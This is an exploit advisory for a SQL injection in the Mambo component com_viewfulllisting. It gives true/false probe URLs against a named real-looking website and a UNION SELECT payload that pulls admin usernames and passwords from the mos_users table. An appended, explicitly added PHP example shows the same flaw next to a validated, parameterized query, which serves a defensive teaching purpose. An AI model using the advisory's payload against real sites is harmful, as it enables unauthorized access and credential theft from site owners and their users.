<------------------- header data start ------------------- >
#####################################################################
# Mambo Component com_viewfulllisting SQL injection Vulnerability                                   
#####################################################################

# author         : FL0RiX

# Greez          : Deep-Power,PyskE,Ruzgarin_Oglu,CWWarning0fvirüs & All My Friends

# Name           : com_viewfulllisting

# Bug Type       : SQL Injection

# Infection      : Admin login credentials can be obtained.

# Demo Vuln.     :
TRUE(+)
http://www.itamos.com/index.php?option=com_viewfulllisting&listing_id=2423 and 1=1
FALSE(-)
http://www.itamos.com/index.php?option=com_viewfulllisting&listing_id=2423 and 1=0

# Bug Fix Advice : Malicious characters should be filtered.

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

path/index.php?option=com_viewfulllisting&listing_id=null/**/and/**/1=0/**/union/**/select/**/1,2,3,4,5,6,7,8,9,concat(username,0x3,password)fl0rixf0rever,11,12/**/from/**/mos_users

< -- bug code end of -- >
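
Added example (not part of the original advisory and not the component's own code): the fix advice above, shown in PHP as a concatenated lookup beside a validated, parameterized one. The listings table, its columns and the function names are hypothetical, and an in-memory SQLite database stands in for the site's database.

```php
<?php
// Added example: table, column and function names are hypothetical,
// not taken from com_viewfulllisting. Runs offline against SQLite via PDO.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE listings (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO listings (id, title) VALUES (2423, 'Sample listing')");

// Vulnerable pattern: the request value is concatenated into the SQL text,
// so anything after the number becomes part of the query.
function find_listing_unsafe(PDO $db, string $raw): array
{
    $sql = 'SELECT id, title FROM listings WHERE id = ' . $raw;
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened pattern: accept only a positive decimal integer, then bind it
// as a typed parameter so it can never be parsed as SQL.
function find_listing_safe(PDO $db, string $raw): array
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return [];  // reject the request instead of trying to clean the input
    }
    $stmt = $db->prepare('SELECT id, title FROM listings WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed inputs: a normal id and the two boolean probes from the advisory.
foreach (['2423', '2423 and 1=1', '2423 and 1=0'] as $raw) {
    printf("%-14s unsafe=%d row(s)  safe=%d row(s)\n",
        $raw,
        count(find_listing_unsafe($db, $raw)),
        count(find_listing_safe($db, $raw)));
}
```

With the concatenated query the two probes return different row counts, which is the TRUE/FALSE difference the demo relies on; with integer validation and a bound parameter both probes are rejected identically.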
 		 	   		  